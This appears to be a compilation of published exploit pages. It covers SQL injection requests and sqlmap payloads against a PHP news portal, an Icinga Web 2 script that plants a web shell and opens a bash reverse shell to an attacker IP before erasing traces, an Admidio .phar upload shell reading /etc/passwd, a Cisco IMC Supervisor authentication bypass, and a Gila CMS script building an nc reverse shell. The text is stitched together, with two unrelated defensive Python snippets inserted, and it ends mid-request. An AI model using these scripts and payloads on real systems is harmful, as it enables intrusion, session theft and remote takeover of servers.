# Version: 4.0
# We are looking for work security engineer, security administrator: https://www.pracuj.pl/praca/security-engineer-warszawa-plocka-9-11,oferta,1002635314
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

## Example 1
-----------------------------------------------------------------------------------------------------------------------
Param: name, email, comment
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /newsportal/news-details.php?nid=13 HTTP/1.1
Origin: http://127.0.0.1
Sec-Fetch-User: ?1
Host: 127.0.0.1:80
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate
Sec-Fetch-Site: same-origin
sec-ch-ua-mobile: ?0
Content-Length: 277
Sec-Fetch-Mode: navigate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Connection: close
Referer: http://127.0.0.1/newsportal/news-details.php?nid=13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-ch-ua-platform: "Windows"
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
Sec-Fetch-Dest: document

csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))''&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 09 Jul 2023 10:55:26 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
X-Powered-By: PHP/8.1.17
Set-Cookie: PHPSESSID=l7dg3s1in50ojjigs4vm2p0r9s; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 146161

<script>alert('comment successfully submit. Comment will be display after admin review ');</script>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="">
<meta name="author" content="">
<title>News Portal | Home Page
[...]

-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /newsportal/news-details.php?nid=13 HTTP/1.1
Origin: http://127.0.0.1
Sec-Fetch-User: ?1
Host: 127.0.0.1:80
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate
Sec-Fetch-Site: same-origin
sec-ch-ua-mobile: ?0
Content-Length: 276
Sec-Fetch-Mode: navigate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Connection: close
Referer: http://127.0.0.1/newsportal/news-details.php?nid=13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-ch-ua-platform: "Windows"
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
Sec-Fetch-Dest: document

csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))'&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 09 Jul 2023 10:56:06 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
X-Powered-By: PHP/8.1.17
Set-Cookie: PHPSESSID=fcju4nb9mr2tu80mqv5cnduldk; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 525
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Fatal error</b>: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'admin@local.host','ssssssssssssssssssssssssss','0')' at line 1 in C:\xampp3\htdocs\newsportal\news-details.php:21
Stack trace:
#0 C:\xampp3\htdocs\newsportal\news-details.php(21): mysqli_query(Object(mysqli), 'insert into tbl...')
#1 {main}
  thrown in <b>C:\xampp3\htdocs\newsportal\news-details.php</b> on line <b>21</b><br />
-----------------------------------------------------------------------------------------------------------------------
SQLMap example param 'comment':
-----------------------------------------------------------------------------------------------------------------------
sqlmap identified the following injection point(s) with a total of 450 HTTP(s) requests:
---
Parameter: #2* ((custom) POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' RLIKE (SELECT (CASE WHEN (3649=3649) THEN 0x7373737373737373737373737373737373737373737373737373 ELSE 0x28 END)) AND 'xRsB'='xRsB&submit=

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' OR (SELECT 6120 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(6120=6120,1))),0x7170717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'odEK'='odEK&submit=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' AND (SELECT 1610 FROM (SELECT(SLEEP(5)))mZUx) AND 'bjco'='bjco&submit=
---
web application technology: PHP 8.1.17, Apache 2.4.56
back-end DBMS: MySQL >= 5.0 (MariaDB fork)

## Example 2 - login to administration panel
-----------------------------------------------------------------------------------------------------------------------
Param: username
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /newsportal/admin/ HTTP/1.1
Host: 127.0.0.1
Content-Length: 42
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/newsportal/admin/
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: USERSUB_TYPE=0; IS_MODERATOR=0; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; user_uniq_agent=95e1b7d0ab9086d6b88e9adfaacf07d887164827a5708adf; SES_ROLE=3; USER_UNIQ=117b06da2ff9aabad1a916992e92bb26; USERTYP=3; USERTZ=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8dba9a451f44121c45180df414ab6917; DEFAULT_PAGE=dashboard; CURRENT_FILTER=cases; currency=USD; phpsessid-9795-sid=s7b0dqlpebu74ls14j61e5q3be; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8
Connection: close

username=admin'&password=Test%40123&login=
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 09 Jul 2023 11:00:53 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
X-Powered-By: PHP/8.1.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 505
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Fatal error</b>: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'f925916e2754e5e03f75dd58a5733251')' at line 1 in C:\xampp3\htdocs\newsportal\admin\index.php:13
Stack trace:
#0 C:\xampp3\htdocs\newsportal\admin\index.php(13): mysqli_query(Object(mysqli), 'SELECT AdminUse...')
#1 {main}
  thrown in <b>C:\xampp3\htdocs\newsportal\admin\index.php</b> on line <b>13</b><br />
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /newsportal/admin/ HTTP/1.1
Host: 127.0.0.1
Content-Length: 43
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type:
application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://127.0.0.1/newsportal/admin/ Accept-Encoding: gzip, deflate Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: USERSUB_TYPE=0; IS_MODERATOR=0; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; user_uniq_agent=95e1b7d0ab9086d6b88e9adfaacf07d887164827a5708adf; SES_ROLE=3; USER_UNIQ=117b06da2ff9aabad1a916992e92bb26; USERTYP=3; USERTZ=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8dba9a451f44121c45180df414ab6917; DEFAULT_PAGE=dashboard; CURRENT_FILTER=cases; currency=USD; phpsessid-9795-sid=s7b0dqlpebu74ls14j61e5q3be; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8 Connection: close username=admin''&password=Test%40123&login= ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sun, 09 Jul 2023 11:02:15 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17 X-Powered-By: PHP/8.1.17 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 4733 Connection: close Content-Type: text/html; charset=UTF-8 <script>alert('Invalid 
Details');</script> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="News Portal."> <meta name="author" content="PHPGurukul"> <!-- App title --> <title>News Portal | Admin Panel</title> [...]
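Both observations above (a PHP fatal error for `username=admin'`, "Invalid Details" for `username=admin''`) are what string concatenation into the SQL text produces. As an added example, not the newsportal code, here is that pattern beside its parameterized form, run against a constructed in-memory SQLite table (table and column names are assumptions):

```python
import sqlite3


def build_db():
    """Constructed stand-in for the admin table; column names are assumed and
    the stored password hash is a placeholder."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE admin (AdminUserName TEXT, Password TEXT)")
    con.execute("INSERT INTO admin VALUES ('admin', 'PLACEHOLDER_HASH')")
    con.commit()
    return con


def login_concat(con, username, password_hash):
    """The pattern behind the stack trace on the page: form values are spliced
    into the SQL string, so a quote in the input rewrites the statement."""
    sql = ("SELECT AdminUserName FROM admin WHERE AdminUserName='%s' "
           "AND Password='%s'" % (username, password_hash))
    return con.execute(sql).fetchone()


def login_param(con, username, password_hash):
    """Hardened form: the SQL text is constant and the values travel as bound
    parameters, so they can never change the statement's structure."""
    sql = "SELECT AdminUserName FROM admin WHERE AdminUserName=? AND Password=?"
    return con.execute(sql, (username, password_hash)).fetchone()


def outcome(login_fn, username, password_hash="PLACEHOLDER_HASH"):
    """Classify what the application would show for one login attempt:
    'error' (the fatal error on the page), 'denied' ('Invalid Details')
    or 'row' (a matching account)."""
    con = build_db()
    try:
        row = login_fn(con, username, password_hash)
    except sqlite3.OperationalError:
        return "error"
    finally:
        con.close()
    return "row" if row else "denied"


if __name__ == "__main__":
    for user in ("admin", "admin'", "admin''"):
        print(f"{user!r:12} concat={outcome(login_concat, user):7} "
              f"param={outcome(login_param, user)}")
```

The concatenated version reproduces the page's two responses exactly (syntax error, then no row); the parameterized version treats both inputs as user names that simply do not exist.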
HireHackking

Icinga Web 2.10 - Authenticated Remote Code Execution

```python
#!/usr/bin/env python3
# Exploit Title: Icinga Web 2.10 - Authenticated Remote Code Execution
# Date: 8/07/2023
# Exploit Author: Dante Corona(Aka. cxdxnt)
# Software Link: https://github.com/Icinga/icingaweb2
# Vendor Homepage: https://icinga.com/
# Software Link: https://github.com/Icinga/icingaweb2
# Version: <2.8.6, <2.9.6, <2.10
# Tested on: Icinga Web 2 Version 2.9.2 on Linux
# CVE: CVE-2022-24715
# Based on: https://nvd.nist.gov/vuln/detail/CVE-2022-24715

import requests,argparse,re,random,string
from colorama import Fore,Style


def letter_random():
    letras = string.ascii_lowercase
    character_random = random.choices(letras, k=6)
    return ''.join(character_random)


def users_url_password():
    parser = argparse.ArgumentParser(description='Descripción de tu programa.')
    parser.add_argument('-u', '--url',type=str,required=True, help='Insertar la URL http://ip_victima')
    parser.add_argument('-U', '--user',type=str, required=True ,help='Insertar usuario -U user')
    parser.add_argument('-P', '--password',type=str, required=True ,help='Insertar contraseña -P password')
    parser.add_argument('-i', '--ip',type=str,required=True,help='Insertar IP de atacante -i IP')
    parser.add_argument('-p','--port',type=str, required=True,help='Insertar puerto de atacante -p PORT')
    args = parser.parse_args()
    url = args.url
    user = args.user
    password=args.password
    ip_attack = args.ip
    port_attack = args.port
    return url,user,password,ip_attack,port_attack


def login(url,user,password):
    try:
        login_url = url + "/icingaweb2/authentication/login"
        session = requests.Session()
        r = session.get(login_url)
        csrf_regex = re.findall(r'name="CSRFToken" value="([^"]*)"',r.text)[0]
        data_post = {"username":user,
                     "password":password,
                     "CSRFToken":csrf_regex,
                     "formUID":"form_login",
                     "btn_submit":"Login"
                     }
        response = session.post(login_url,data=data_post)
        if "Welcome to Icinga Web!" in response.text:
            print(f"{Fore.GREEN}[*]{Style.RESET_ALL}Session successfully.")
            r = session.get(login_url)
        else:
            print("[!]Failed to login.")
            exit(1)
        #return session,csrf_regex
    except requests.exceptions.InvalidURL:
        print(f"{Fore.YELLOW}[!]{Style.RESET_ALL} Error URL :(")
        exit(1)
    return session,csrf_regex


def upload_file(session,url,character_random,csrf_regex):
    webshell = f"""-----BEGIN RSA PRIVATE KEY-----
MIIBOgIBAAJBAKj34GkxFhD90vcNLYLInFEX6Ppy1tPf9Cnzj4p4WGeKLs1Pt8Qu
KUpRKfFLfRYC9AIKjbJTWit+CqvjWYzvQwECAwEAAQJAIJLixBy2qpFoS4DSmoEm
o3qGy0t6z09AIJtH+5OeRV1be+N4cDYJKffGzDa88vQENZiRm0GRq6a+HPGQMd2k
TQIhAKMSvzIBnni7ot/OSie2TmJLY4SwTQAevXysE2RbFDYdAiEBCUEaRQnMnbp7
9mxDXDf6AU0cN/RPBjb9qSHDcWZHGzUCIG2Es59z8ugGrDY+pxLQnwfotadxd+Uy
v/Ow5T0q5gIJAiEAyS4RaI9YG8EWx/2w0T67ZUVAw8eOMB6BIUg0Xcu+3okCIBOs
/5OiPgoTdSy7bcF9IGpSE8ZgGKzgYQVZeN97YE00
-----END RSA PRIVATE KEY-----
<?php system($_REQUEST["%s"]);?>
"""%character_random
    upload_url = url + "/icingaweb2/config/createresource"
    r = session.get(upload_url)
    csrf = re.findall(r'name="CSRFToken" value="([^"]*)"',r.text)[0]
    data_post ={"type":"ssh",
                "name":"shm/"+character_random,
                "user":f"../../../../../../../../../../../dev/shm/{character_random}/run.php",
                "private_key":webshell,
                "formUID":"form_config_resource",
                "CSRFToken":csrf,
                "btn_submit":"Save Changes"
                }
    upload_response = session.post(upload_url,data=data_post)
    check = requests.get(url + f"/icingaweb2/lib/icinga/icinga-php-thirdparty/dev/shm/{character_random}/run.php")
    if check.status_code != 200 :
        print(f"{Fore.YELLOW}[!]{Style.RESET_ALL}Error uploading file. :(")
        exit(1)
    else:
        print(f"{Fore.GREEN}[*]{Style.RESET_ALL}File uploaded successfully.")


def enable_module(session,url,character_random):
    url_module = url+"/icingaweb2/config/general"
    r_module = session.get(url_module)
    csrf_module = re.findall(r'name="CSRFToken" value="([^"]*)"',r_module.text)[0]
    data_post = {"global_show_stacktraces":"0",
                 "global_show_stacktraces":"1",
                 "global_show_application_state_messages":"0",
                 "global_show_application_state_messages":"1",
                 "global_module_path":"/dev/shm/",
                 "global_config_resource":"icingaweb2",
                 "logging_log":"none",
                 "themes_default":"Icinga",
                 "themes_disabled":"0",
                 "authentication_default_domain":"",
                 "formUID":"form_config_general",
                 "CSRFToken":f"{csrf_module}",
                 "btn_submit":"Save Changes"
                 }
    resul = session.post(url_module,data_post)
    #--------------------------------------------------
    url_enable = url +"/icingaweb2/config/moduleenable"
    r_enable = session.get(url_enable)
    csrf_enable = re.findall(r'name="CSRFToken" value="([^"]*)"',r_enable.text)[0]
    data_enable = {"identifier":f"{character_random}","CSRFToken":f"{csrf_enable}","btn_submit":"btn_submit"}
    resul_enable = session.post(url_enable,data_enable)


def reverse_shell(session,url,ip_attack,port_attack,character_random):
    reverse_url = url + "/icingaweb2/dashboard"
    reverse_exe_one = reverse_url + f'?{character_random}=echo+"bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{ip_attack}%2F{port_attack}%200%3E%261"+>+/tmp/{character_random}'
    reverse_exe_two = reverse_url + f"?{character_random}=bash+/tmp/{character_random} &"
    reverse_response_one = session.get(reverse_exe_one)
    try:
        reverse_response_two = session.get(reverse_exe_two, timeout=5)
    except:
        print(f"{Fore.RED}[*]{Style.RESET_ALL}Eliminating evidence")
        remove = session.get(reverse_url + f"?{character_random}=rm+/tmp/{character_random}")
        disable_url = url + "/icingaweb2/config/moduledisable"
        r_disable = session.get(disable_url)
        csrf_disable = re.findall(r'name="CSRFToken" value="([^"]*)"',r_disable.text)[0]
        data_disable = {"identifier":f"{character_random}","CSRFToken":csrf_disable,"btn_submit":"btn_submit"}
        response_disable = session.post(disable_url,data=data_disable)


def disable_module(session,url,character_random):
    url_disable = url + "/icingaweb2/config/moduledisable"


if __name__ == '__main__':
    character_random = letter_random()
    url,user,password,ip_attack,port_attack = users_url_password()
    session,csrf_regex = login(url,user,password)
    upload_file(session,url,character_random,csrf_regex)
    enable_module(session,url,character_random)
    reverse_shell(session,url,ip_attack,port_attack,character_random)
```
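The upload step above works because the SSH resource's `user` field is used as a path component when the private key file is written, and `../` sequences walk it out of the intended directory. An added example, not Icinga Web 2's code (the key directory and the naming rule are assumptions), of how a file name derived from a form field should be constrained:

```python
import posixpath
import re

# Assumed location for per-resource key files; not Icinga Web 2's real layout.
KEY_BASE = "/var/lib/icingaweb2/ssh"

# A resource user name must start with an alphanumeric character, so "." and
# ".." can never match, and it never contains a path separator.
USER_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.@-]{0,63}$")


def key_path_for(user, base=KEY_BASE):
    """Map a form-supplied user name to the file that will hold its key,
    raising ValueError for anything that does not land under base."""
    # Layer 1: positive validation of the field itself.
    if not USER_RE.fullmatch(user):
        raise ValueError("user name contains characters that are not allowed")
    # Layer 2 (defense in depth): normalize, then prove containment, so a
    # later relaxation of the regex still cannot produce an escape.
    candidate = posixpath.normpath(posixpath.join(base, user))
    if posixpath.commonpath([base, candidate]) != base or candidate == base:
        raise ValueError("resolved path escapes the key directory")
    return candidate


def containment_only(user, base=KEY_BASE):
    """Layer 2 on its own, to show that it catches the traversal used above
    even without the regex (it would still allow a subdirectory, though)."""
    candidate = posixpath.normpath(posixpath.join(base, user))
    return posixpath.commonpath([base, candidate]) == base and candidate != base


def is_safe_user(user):
    try:
        key_path_for(user)
        return True
    except ValueError:
        return False
```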
HireHackking

Admidio v4.2.10 - Remote Code Execution (RCE)

Exploit Title: Admidio v4.2.10 - Remote Code Execution (RCE)
Application: Admidio
Version: 4.2.10
Bugs: RCE
Technology: PHP
Vendor URL: https://www.admidio.org/
Software Link: https://www.admidio.org/download.php
Date found: 10.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================
Steps:
1. Login to account
2. Go to Announcements
3. Add Entry
4. Upload .phar file in image upload section.

.phar file Content:
<?php echo system('cat /etc/passwd');?>

5. Visit .phar file ( http://localhost/admidio/adm_my_files/announcements/images/20230710-172217_430o3e5ma5dnuvhp.phar )

Request:

POST /admidio/adm_program/system/ckeditor_upload_handler.php?CKEditor=ann_description&CKEditorFuncNum=1&langCode=en HTTP/1.1
Host: localhost
Content-Length: 378
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryne9TRuC1tAqhR86r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/admidio/adm_program/modules/announcements/announcements_new.php?headline=Announcements
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ADMIDIO_admidio_adm_cookieconsent_status=dismiss; ADMIDIO_admidio_adm_SESSION_ID=penqrouatvh0vmp8v2mdntrgdn; ckCsrfToken=o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MB
Connection: close

------WebKitFormBoundaryne9TRuC1tAqhR86r
Content-Disposition: form-data; name="upload"; filename="shell.phar"
Content-Type: application/octet-stream

<?php echo system('cat /etc/passwd');?>
------WebKitFormBoundaryne9TRuC1tAqhR86r
Content-Disposition: form-data; name="ckCsrfToken"

o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MB
------WebKitFormBoundaryne9TRuC1tAqhR86r--
HireHackking

Cisco UCS-IMC Supervisor 2.2.0.0 - Authentication Bypass

```python
"""
[+] Exploit Title: Cisco UCS-IMC Supervisor 2.2.0.0 - Authentication Bypass
[+] Cisco IMC Supervisor - < 2.2.1.0
[+] Date: 08/21/2019
[+] Affected Component: /app/ui/ClientServlet?apiName=GetUserInfo
[+] Vendor: https://www.cisco.com/c/en/us/products/servers-unified-computing/integrated-management-controller-imc-supervisor/index.html
[+] Vulnerability Discovery : Pedro Ribeiro
[+] Exploit Author: Fatih Sencer
[+] CVE: CVE-2019-1937
----------------------------------------------------
Usage: ./python3 CiscoIMC-Bypass.py -u host

[+] Target https://xxxxxx.com
[+] Target OK
[+] Exploit Succes
[+] Login name : admin
[+] Cookie : REACTED
"""
import argparse,requests,warnings,base64,json,random,string
from requests.packages.urllib3.exceptions import InsecureRequestWarning

warnings.simplefilter('ignore',InsecureRequestWarning)


def init():
    parser = argparse.ArgumentParser(description='Cisco IMC Supervisor / Authentication Bypass')
    parser.add_argument('-u','--host',help='Host', type=str, required=True)
    args = parser.parse_args()
    exploit(args)


def exploit(args):
    session = requests.Session()
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4)",
        "X-Requested-With": "XMLHttpRequest",
        "Referer": "https://{}/".format(args.host),
        "X-Starship-UserSession-Key": ''.join(random.choices(string.ascii_uppercase + string.digits, k=10)),
        "X-Starship-Request-Key": ''.join(random.choices(string.ascii_uppercase + string.digits, k=10))
    }
    target = "https://{}/app/ui/ClientServlet?apiName=GetUserInfo".format(args.host)
    print("[+] Target {}".format(args.host))
    exp_send = session.get(target, headers=headers, verify=False, timeout=10)
    if exp_send.status_code == 200:
        print("[+] Target OK")
        body_data = json.loads(exp_send.text)
        if not (body_data.get('loginName') is None):
            print("[+] Exploit Succes")
            print("[+] Login name : {}".format(body_data.get('loginName')))
            print("[+] Cookie : {}".format(session.cookies.get_dict()))
        else:
            print("[-] Exploit Failed")
    else:
        print("[-] N/A")
        exit()


if __name__ == "__main__":
    init()
```
HireHackking

Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated)

```python
# Exploit Title: Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated)
# Date: 05-07-2023
# Exploit Author: Omer Shaik (unknown_exploit)
# Vendor Homepage: https://gilacms.com/
# Software Link: https://github.com/GilaCMS/gila/
# Version: Gila 1.10.9
# Tested on: Linux

import requests
from termcolor import colored
from urllib.parse import urlparse

# Print ASCII art
ascii_art = """
 ██████╗ ██╗██╗      █████╗  ██████╗███╗   ███╗███████╗    ██████╗  ██████╗███████╗
██╔════╝ ██║██║     ██╔══██╗██╔════╝████╗ ████║██╔════╝    ██╔══██╗██╔════╝██╔════╝
██║  ███╗██║██║     ███████║██║     ██╔████╔██║███████╗    ██████╔╝██║     █████╗
██║   ██║██║██║     ██╔══██║██║     ██║╚██╔╝██║╚════██║    ██╔══██╗██║     ██╔══╝
╚██████╔╝██║███████╗██║  ██║╚██████╗██║ ╚═╝ ██║███████║    ██║  ██║╚██████╗███████╗
 ╚═════╝ ╚═╝╚══════╝╚═╝  ╚═╝ ╚═════╝╚═╝     ╚═╝╚══════╝    ╚═╝  ╚═╝ ╚═════╝╚══════╝
                                                        by Unknown_Exploit
"""
print(colored(ascii_art, "green"))

# Prompt user for target URL
target_url = input("Enter the target login URL (e.g., http://example.com/admin/): ")

# Extract domain from target URL
parsed_url = urlparse(target_url)
domain = parsed_url.netloc
target_url_2 = f"http://{domain}/"

# Prompt user for login credentials
username = input("Enter the email: ")
password = input("Enter the password: ")

# Create a session and perform login
session = requests.Session()
login_payload = {
    'action': 'login',
    'username': username,
    'password': password
}
response = session.post(target_url, data=login_payload)
cookie = response.cookies.get_dict()
var1 = cookie['PHPSESSID']
var2 = cookie['GSESSIONID']

# Prompt user for local IP and port
lhost = input("Enter the local IP (LHOST): ")
lport = input("Enter the local port (LPORT): ")

# Construct the payload
payload = f"rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc+{lhost}+{lport}+>/tmp/f"
payload_url = f"{target_url_2}tmp/shell.php7?cmd={payload}"

# Perform file upload using POST request
upload_url = f"{target_url_2}fm/upload"
upload_headers = {
    "Host": domain,
    "Content-Length": "424",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36",
    "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarynKy5BIIJQcZC80i2",
    "Accept": "*/*",
    "Origin": target_url_2,
    "Referer": f"{target_url_2}admin/fm?f=tmp/.htaccess",
    "Accept-Encoding": "gzip, deflate",
    "Accept-Language": "en-US,en;q=0.9",
    "Cookie": f"PHPSESSID={var1}; GSESSIONID={var2}",
    "Connection": "close"
}
upload_data = f'''
------WebKitFormBoundarynKy5BIIJQcZC80i2
Content-Disposition: form-data; name="uploadfiles"; filename="shell.php7"
Content-Type: application/x-php

<?php system($_GET["cmd"]);?>
------WebKitFormBoundarynKy5BIIJQcZC80i2
Content-Disposition: form-data; name="path"

tmp
------WebKitFormBoundarynKy5BIIJQcZC80i2
Content-Disposition: form-data; name="g_response"

content
